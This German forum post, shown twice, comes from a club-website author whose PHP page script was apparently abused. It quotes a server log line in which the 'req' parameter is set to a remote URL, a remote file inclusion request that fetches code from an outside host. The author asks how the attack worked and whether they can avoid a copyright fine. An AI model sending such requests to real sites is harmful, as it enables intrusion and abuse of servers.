Tweet
Hallo,
ich habe ein Webscript programmiert - Eigentlich eine ganz normale Vereinsseite eines Sport-Schützen-Vereines. Jetzt wurde der Server für mich gesperrt und habe eine Urheberrechtsstrafe zu zahlen.
Folgendes ist passiert.
Ich übergebe den Seiteninhalt Aufruf mit POST und GET also schaut meine URL wie folgt aus:
www.serveradresse.de/index.php?req=main
das Script weis dann das es die inhalte aus der SQL Datenbank unter dem Eintrag main hervorholen soll.
Jetzt wurde mein Script angeblich dazu verwendet um Dateien auf dem Server abzulegen. Angeblich Videos und so und der Hacker oder wie auch immer hat meine Index Datei benutzt um diese angeblich von meinem Server abzurufen.
Der link laut LOG dateien sieht wie folgt aus... (IP Adresse mit absicht gepostet, da es von irgendjemanden ist, der am 13.01.2007 dieses URL ausgeführt hat.)
87.6.106.140 - - [13/Jan/2007:15:49:56 +0100] "GET /index.php?req=http://beforethehighway.com/phpmyadmin/osx-sux.jpg? HTTP/1.1" 200 56519 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
Ich verstehe nur nicht wie 1. derjenige über diese Zeile angebliche Files auf meinen Server legen hätte können, und 2. wie er sie mit diesem Befehl für andere zur Verfügung stellen kann.
3. kann ich der Urheberrechtsstrafe auskommen, da hier ja ein Hacker unterwegs war?
4. ich finde nur Logs wo er abfragen gemacht hatte, aber nicht wo der Upload stattgefunden hat.
5. Ich habe auf einer Englischen Seite einen Eintrag gefunden unter:
http://www.castlecops.com/modules.ph...&id=44833&in=1
Hier ist auch was dazu erwähnt, aber ich komm damit nicht klar, weil hier von Ebay die rede ist. Laut meinem Serverbetreiber aber Videos und Online Casinos und Strip Poker anbieter sich abgelegt hätten.
6. Ist der Serverbetreiber nicht auch dafür verantwortlich das Seiten die er hostet geschützt werden durch unbefugtes Hacken?
7. Mit der seite http://beforethehighway.com kann man nicht wirklich was anfangen, ausser wenn man sich mal deren Quellcode ansieht, aber daraus werde ich auch nicht schlau, wie dieses Script aus Unterordnern meiner Seite welche ich für meine Zwecke eingerichtet hatte, genau eine bestimmte Datei ziehen kann. Noch dazu weil der Abfragelink immer der gleiche ist, aber ca von 500 verschiedenen Personen abgerufen wurde (IP-Adressen unterschiedlich) und das in nur wenigen Stunden.
Ich wäre euch echt dankbar, wenn mir hier einer eine Hilfe geben kann.
Wenn Ihr noch ein paar nähere Infos für meine Problematik habt, dann schreibt bzw. fragt mich, ich brauche eure hilfe, und somit gebe ich euch die nötigen Infos...
Schöne Grüße
Clamsy
ich habe ein Webscript programmiert - Eigentlich eine ganz normale Vereinsseite eines Sport-Schützen-Vereines. Jetzt wurde der Server für mich gesperrt und habe eine Urheberrechtsstrafe zu zahlen.
Folgendes ist passiert.
Ich übergebe den Seiteninhalt Aufruf mit POST und GET also schaut meine URL wie folgt aus:
www.serveradresse.de/index.php?req=main
das Script weis dann das es die inhalte aus der SQL Datenbank unter dem Eintrag main hervorholen soll.
Jetzt wurde mein Script angeblich dazu verwendet um Dateien auf dem Server abzulegen. Angeblich Videos und so und der Hacker oder wie auch immer hat meine Index Datei benutzt um diese angeblich von meinem Server abzurufen.
Der link laut LOG dateien sieht wie folgt aus... (IP Adresse mit absicht gepostet, da es von irgendjemanden ist, der am 13.01.2007 dieses URL ausgeführt hat.)
87.6.106.140 - - [13/Jan/2007:15:49:56 +0100] "GET /index.php?req=http://beforethehighway.com/phpmyadmin/osx-sux.jpg? HTTP/1.1" 200 56519 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
Ich verstehe nur nicht wie 1. derjenige über diese Zeile angebliche Files auf meinen Server legen hätte können, und 2. wie er sie mit diesem Befehl für andere zur Verfügung stellen kann.
3. kann ich der Urheberrechtsstrafe auskommen, da hier ja ein Hacker unterwegs war?
4. ich finde nur Logs wo er abfragen gemacht hatte, aber nicht wo der Upload stattgefunden hat.
5. Ich habe auf einer Englischen Seite einen Eintrag gefunden unter:
http://www.castlecops.com/modules.ph...&id=44833&in=1
Hier ist auch was dazu erwähnt, aber ich komm damit nicht klar, weil hier von Ebay die rede ist. Laut meinem Serverbetreiber aber Videos und Online Casinos und Strip Poker anbieter sich abgelegt hätten.
6. Ist der Serverbetreiber nicht auch dafür verantwortlich das Seiten die er hostet geschützt werden durch unbefugtes Hacken?
7. Mit der seite http://beforethehighway.com kann man nicht wirklich was anfangen, ausser wenn man sich mal deren Quellcode ansieht, aber daraus werde ich auch nicht schlau, wie dieses Script aus Unterordnern meiner Seite welche ich für meine Zwecke eingerichtet hatte, genau eine bestimmte Datei ziehen kann. Noch dazu weil der Abfragelink immer der gleiche ist, aber ca von 500 verschiedenen Personen abgerufen wurde (IP-Adressen unterschiedlich) und das in nur wenigen Stunden.
Ich wäre euch echt dankbar, wenn mir hier einer eine Hilfe geben kann.
Wenn Ihr noch ein paar nähere Infos für meine Problematik habt, dann schreibt bzw. fragt mich, ich brauche eure hilfe, und somit gebe ich euch die nötigen Infos...
Schöne Grüße
Clamsy
Kommentar